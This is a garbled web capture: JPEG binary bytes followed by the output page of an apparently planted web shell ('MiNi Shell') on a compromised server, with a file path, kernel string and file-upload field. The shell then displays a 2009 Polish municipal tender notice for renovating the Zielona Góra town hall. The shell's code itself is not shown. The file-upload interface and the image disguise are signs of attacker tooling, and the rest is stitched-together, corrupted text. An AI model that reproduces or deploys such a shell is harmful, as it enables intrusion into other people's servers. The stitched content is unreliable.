JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090922/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090922/161703-N-2009.html

<p class="kh_header"><b>Zielona Góra: Polsko - Niemieckie Centrum Promocji i Informacji Turystycznej w Ratuszu Miejskim w Zielonej Górze przy ul. Stary Rynek 1, dz. Nr 314, które obejmuje remont pomieszczeń w budynku Ratusza w zakresie robót budowlanych, sanitarnych i elektrycznych oraz wytycznych konserwatorskich.</b><br>
<b>Numer ogłoszenia: 161703 - 2009; data zamieszczenia: 22.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta , ul. Podgórna 22, 65-424 Zielona Góra, woj. lubuskie, tel. 0684564100,4564406 do 08, faks 068 4564155, 4564455.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.zielona-gora.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Polsko - Niemieckie Centrum Promocji i Informacji Turystycznej w Ratuszu Miejskim w Zielonej Górze przy ul. Stary Rynek 1, dz. Nr 314, które obejmuje remont pomieszczeń w budynku Ratusza w zakresie robót budowlanych, sanitarnych i elektrycznych oraz wytycznych konserwatorskich..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1.	Przebudowa pomieszczeń Ratusza po byłej restauracji Indyjskiej.

3.1.1.	W południowej części Ratusza, na poziomie parteru znajdują się pomieszczenia aktualnie nie zagospodarowane, w których należy wykonać zgodnie z dokumentacja projektową:
- pomieszczenie obsługi turystycznej,
- biblioteczkę,
- salkę konferencyjną i wielofunkcyjną,
- pomieszczenie biurowe,
- pomieszczenie socjalne,
- zadaszenie na rowery, 
- sanitariaty.
Komunikacja między pomieszczeniami została zaprojektowana tak, aby mogły korzystać z nich  osoby niepełnosprawne.

3.1.2.	Wszystkie prace związane z przebudową należy wykonać zgodnie dokumentacją projektową, obowiązującymi normami, sztuką budowlaną, przepisami BHP, ppoż. zgodnie z poleceniami inspektora nadzoru i nadzoru autorskiego.

3.1.3.	Przedmiotowy obiekt znajduje się w strefie ochrony konserwatorskiej.
3.1.4.	Dokumentacja projektowa, służąca do opisu przedmiotu zamówienia na wykonanie robót budowlanych, dla których jest wymagane uzyskanie pozwolenia na budowę, stanowiąca załącznik nr 9 do SIWZ, składa się z:
3.1.4.1.	projektu budowlanego w zakresie uwzględniającym specyfikę robót budowlanych,
3.1.4.2.	przedmiaru robót
3.1.4.3.	specyfikacji technicznej wykonania i odbioru robót.

3.2.	Przebudowa pomieszczeń Ratusza po byłej restauracji Indyjskiej w zakresie robót:
- budowlanych
- elektrycznych
- sanitarnych
3.2.1.	Zakres robót budowlanych obejmuje:
3.2.1.1.	Roboty rozbiórkowe:
(zerwanie posadzek z wykładziny rulonowej, rozbiórka istn. posadzek z płytek lastrykowych i kamienia łamanego, rozbiórka warstw podposadzkowych, rozbiórka licowania ścian z płytek ceramicznych, częściowe zbicie tynków ze ścian i sufitów, rozbiórka murowanych ścianek działowych, wykucie nowych otworów drzwiowych, wykucie istniejących ościeżnic drzwiowych, wykucie bruzd oraz wnęk pod instalacje elektryczne, teletechniczne i sanitarne, usunięcie gruzu na zewnątrz budynku, wywiezienie gruzu samochodami samowyładowczymi 
i utylizacja  gruzu na wysypisku).
3.2.1.2.	Zadaszenie nad pomieszczeniami na rowery i sanitariatami:
(dach konstrukcji stalowej - blacha trapezowa na podciągu stalowym I NP  300,
pokrycie dachówką karpiówką koronkę- nawiązanie kolorystyczne i materiałowe do istniejącego pokrycia dachu Ratusza, w obrębie węzła sanitarnego sufit z blachy trapezowej ocieplony o góry wełna mineralną gr. 20 cm).
3.2.1.3.	Wzmocnienie drewnianego stropu w pomieszczeniu obsługi turystów 
(strop drewniany w sali oznacz. nr 7 należy poddać zabiegom konserwatorskim,
i wzmocnić podciągiem stalowym I 200 HEB). 
3.2.1.4.	Renowacja istniejącej stolarki okiennej i drzwi zewnętrznych  oraz wymiana stolarki drzwiowej wewnętrznej.
3.2.1.5.	Roboty murowe - postawienie nowych ścian konstrukcyjnych i ścianek działowych, zamurowanie zbędnych otworów drzwiowych, naprawa uszkodzeń w ścianach z cegły
(ściany konstrukcyjne oraz nowe ścianki działowe  murowane z bloczków z betonu komórkowego, nadproża nad otworami drzwiowymi stalowe I NP 120, należy wyeksponować w postaci wnęk dawne otwory okienne oraz odsłonić renesansowe arkadowanie ściany).
3.2.1.6.	Wykonanie nowych położy pod posadzki  i posadzek właściwych
(we wszystkich pomieszczeniach należy ułożyć nowe warstwy podposadzkowe 
i izolacyjne oraz ułożyć posadzki z płyt kamiennych granitowych , płytek ceramicznych 18x18cm, płytek gresowych, wykładziny rulonowej PVC i paneli podłogowych 
w zależności od przeznaczenia pomieszczenia).
3.2.1.7.	Wykończanie  wewnętrzne ścian i sufitów
(w pomieszczeniu nr 6 ze sklepieniem  kolebkowym oraz w pomieszczeniu nr 7 wykonać tynki  o nierównej fakturze zagładzone rękawicą, w pozostałych pomieszczeniach uzupełnić tynki cementowo-wapienne kat. III i przetrzeć zaprawa gipsową i pomalować farba emulsyjną matową, na sufitach - płyty gipsowo-kartonowe na rusztach metalowych, w pomieszczeniach mokrych  ściany wyłożyć płytkami ceramicznymi, wyeksponowane krawędzie wnęk podmalować w kolorze czerwieni żelazowej z malowanymi na biało spoinami).

3.2.2.	Zakres robót elektrycznych obejmuje:
3.2.2.1.	Wykonanie rozdzielnic zasilających projektowanie instalacje
(rozdzielnica centrum informacji turystycznej R i rozdzielnica wypożyczalni rowerów R1).
3.2.2.2.	Wykonanie instalacji oświetleniowej, gniazd wtykowych, instalacji sieci strukturalnej 
i dedykowanej:
(całość instalacji wykonana przewodami miedzianymi, jako źródła światła przewidziane są oprawy żarowe- żyrandole i kinkiety ścienne, oraz świetlówki kompaktowe, przewiduje się punkty oświetleniowe z modułem dwufunkcyjnym umożliwiającym ewakuację 
w przypadku zaniku napięcia). 
3.2.2.3.	Wykonanie instalacji siłowej i instalacji ochronnych:
(instalacja wykonana jest przewodami miedzianymi i dotyczy wytwornicy wody lodowej, central nawiewno-wywiewnych, ciśnieniowych podgrzewaczy wody, zasilania wentylatorów, grzejników clima convektor oraz elektronicznego informatora turystycznego Miasta.

3.2.3.	Zakres robót sanitarnych obejmuje:
3.2.3.1.	Wewnętrzna instalacja kanalizacyjna:
(kanalizacja odpływowa   wykonana pod posadzką  parteru z rur PCV, piony i podejścia do przyborów wykonane z rur PCV łączonych na uszczelki gumowe, sanitariat dla niepełnosprawnych wyposażony w przybory uchwyty ułatwiające korzystanie z WC osobom poruszającym się  na wózkach inwalidzkich).
3.2.3.2.	Wewnętrzna  instalacja wodociągowa:
(doprowadzenie zimnej wody do pomieszczeń z wykorzystaniem istniejącego przyłącza wody zlokalizowanego w sąsiedniej piwnicy Ratusza, na odgałęzieniu od istniejącego przyłącza należy zamontować zestaw wodomierzowy z wodomierzem skrzydełkowym klasy C O 20mm,  filtrem do  zimnej wody O 25mm  i  zaworem antyskażeniowym BA O 25mm, instalacje zimnej wody projektuje się z rur miedzianych, łączonych przez lutowanie z zastosowaniem łączników miedzianych).
3.2.3.3.	Instalacja centralnego ogrzewania:
(zaprojektowane zostało centralne ogrzewanie wodne systemu zamkniętego, czynnik grzewczy dostarczany  będzie z kotłowni w sąsiednim budynku BGŻ, docelowo w Ratuszu wykonany zostanie węzeł cieplny zasilany z wysokoparametrowej miejskiej sieci cieplnej,  instalacje c.o. projektuje się z rur miedzianych, dla mocowania rur miedzianych zastosowano typowe uchwyty, jako elementy grzejne przyjęto klimakonwektory 
z wbudowanymi wentylatorami nawiewnymi w salach konferencyjnych i grzejniki stalowe płytowe z wbudowanymi zaworami grzejnikowymi.
3.2.3.4.	Instalacja wody lodowej:
(zaprojektowana z rur miedzianych łączonych przez lutowanie, rurociągi izolowane otuliną Thermaflex AF, skropliny z klimatyzatorów odprowadzane do kanalizacji z centralnym zasyfonowaniem na odpływie).
3.2.3.5.	Wentylacja mechaniczna:
(wentylacja pomieszczeń parteru nawiewno-wywiewna w oparciu o centrale wentylacyjne wraz z siecią kanałów wentylacyjnych nawiewno-wywiewnych wykonanych z blachy stalowej gr. 0,55-0,7 mm zabezpieczonych antykorozyjnie, dla pomieszczeń WC zaprojektowane zostały wyodrębnione zespoły wentylacyjne wywiewne załączane za pomocą wyłącznika światła).

3.3.	Szczegółowy opis zakresu robót oraz technologia ich wykonania określone zostały w projekcie budowlanym. 

3.4.	Wymagania jakościowe i materiałowe:

3.4.1.	Do wykonania przebudowy wykonawca zobowiązany jest użyć materiałów i urządzeń w I gatunku, gwarantujących  najwyższą jakość, o parametrach technicznych 
i jakościowych  określonych w dokumentacji projektowej.
3.4.2.	Określone w dokumentacji projektowej materiały i urządzenia z nazwy nie są obowiązujące. Zamawiający dopuszcza składanie ofert z użyciem materiałów 
i urządzeń równoważnych do tych określonych w dokumentacji projektowej, pod warunkiem, że ich parametry będą odpowiadały parametrom określonym 
w dokumentacji projektowej.
3.4.3.	Wykonawca składający ofertę na urządzenia równoważne będzie obowiązany do udokumentowania ich równoważności.
3.4.4.	Zabrania się stosowania materiałów nie odpowiadających wymaganiom Polskich Norm. Wykonawca ma obowiązek posiadać w stosunku do użytych materiałów 
i urządzeń dokumenty potwierdzające pozwolenie na ich zastosowanie i wbudowanie (atesty, certyfikaty, deklaracje zgodności, świadectwa jakości).
3.4.5.	Wykonawca zabezpieczy składowane tymczasowo na placu  budowy  materiały                i urządzenia do czasu ich wbudowania przed zniszczeniem, uszkodzeniem lub utratą jakości, właściwości lub parametrów, oraz udostępni do kontroli przez Inspektora nadzoru..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 210.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium:  jest wymagane w kwocie 10.000,00 zł. (dziesięć tysięcy złotych).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 5.1.	W przetargu mogą wziąć udział Wykonawcy niewykluczeni na podstawie art. 24 ust. 1 i 2 ustawy pzp, spełniający warunki zawarte w art. 22 ust. 1 pkt 1-3 ustawy pzp oraz spełniający szczegółowe warunki udziału:
5.1.1.	Posiadają niezbędną wiedzę i doświadczenie tj zrealizowali w okresie ostatnich 5 lat przed dniem wszczęcia postępowania co najmniej:
5.1.1.1.	jedno zadanie o minimalnej wartości minimum 500.000,00 zł brutto w zakresie przebudowy lub remontu lub adaptacji lub modernizacji obiektów użyteczności publicznej;
5.1.1.2.	jedno zadanie w zakresie wykonania robót budowlanych polegających na przebudowie lub remoncie lub modernizacji lub adaptacji obiektów zabytkowych o funkcji obiektów użyteczności publicznej o wartości minimum 500.000,00 zł brutto. 
potwierdzone referencjami, że zostały wykonane należycie;
5.1.2.	dysponują osobami lub będą nimi dysponować, które będą uczestniczyć 
w wykonywaniu zamówienia, należącymi do właściwej izby samorządu zawodowego 
i posiadającymi uprawnienia budowlane do kierowania robotami budowlanymi zgodnie 
z wymogami ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (Dz. U. z 2006 r. Nr 156, poz. 1118 - tekst jednolity z późn. zm.), lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów w specjalności:
5.1.2.1.	 konstrukcyjno - budowlanej bez ograniczeń,
5.1.2.2.	instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń,
5.1.2.3.	instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych 
i elektroenergetycznych bez ograniczeń.
5.1.2.4.	kierownik budowy musi posiadać minimum 2 letnią praktykę zawodową 
na budowie przy obiektach zabytkowych nieruchomych.

5.2.  	Ocena spełniania warunków udziału w postępowaniu zostanie dokonana zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt 6. 3) - 6. 9) SIWZ.

5.3. 	Niespełnienie chociażby jednego z ww. warunków skutkować będzie wykluczeniem Wykonawcy z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 5.2.	Dokumenty i oświadczenia wymagane od Wykonawcy ubiegającego się o zamówienie:
1)	wypełniony formularz oferty wg załącznika Nr 1 do SIWZ;
2)	oświadczenie, że Wykonawca wykona zamówienie własnymi siłami lub określi część zamówienia, której wykonanie powierzy podwykonawcom wg załącznika Nr 2 do SIWZ; 
3)	wypełnione i podpisane oświadczenie o spełnianiu warunków art. 22 ust. 1 pkt 1 - 3 ustawy pzp wg załącznika Nr 3 do SIWZ;
4)	wypełnione i podpisane oświadczenie Wykonawcy, że nie podlega wykluczeniu na podstawie 
art. 24 ust. 1 i ust. 2 ustawy pzp wg załącznika Nr 4 do SIWZ;
5)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
6)	wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - 
w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie wg załącznika nr 5 do SIWZ - na potwierdzenie spełnienia warunku określonego w punkcie 5.1.1. SIWZ;
7)	wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć 
w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności wg załącznika nr 6 do SIWZ - na potwierdzenie spełnienia warunku określonego w punkcie 5.1.2. SIWZ;
8)	pisemne zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt 6.1.7) SIWZ Wykonawca wskazał osoby, którymi będzie dysponował - na potwierdzenie spełnienia warunku określonego w punkcie 5.1.2. SIWZ;
9)	dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień - tj. dokumenty potwierdzające posiadanie uprawnień w wymienionych w punkcie 5.1.2. SIWZ branżach oraz dokumenty potwierdzające przynależność do właściwej izby samorządu zawodowego - na potwierdzenie spełnienia warunku określonego w punkcie 5.1.2. SIWZ;
10)	zaakceptowany projekty umowy wg załącznika Nr 7 do SIWZ;
11)	dokładnie wypełniony kosztorys ofertowy oraz zbiorcza tabela obliczenia ceny, wraz z cenami (netto) (w polskich złotych/ do dwóch miejsc po przecinku), na formularzu wg załącznika od nr 8 do SIWZ;
12)	pełnomocnictwo lub inny dokument określający zakres umocowania do reprezentowania Wykonawcy, o ile ofertę składa pełnomocnik Wykonawcy;
6.1.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w:
6.1.1.	pkt 6.1.5) SIWZ składa dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości;
b)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
Dokumenty powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
6.2.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 6.2. SIWZ, zastępuje się je dokumentami zawierającymi oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www. bip.zielona-gora.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Zielona Góra, 65-424 Zielona Góra, ul. Podgórna 22, pok. 408..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.10.2009 godzina 12:00, miejsce: Urząd Miasta Zielona Góra, 65-424 Zielona Góra, ul. Podgórna 22, pok. 408..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest współfinansowane ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Współpracy Transgranicznej Polska (Województwo Lubuskie) - Brandenburgia 2007-2013.

Creat By MiNi SheLL
Email: jattceo@gmail.com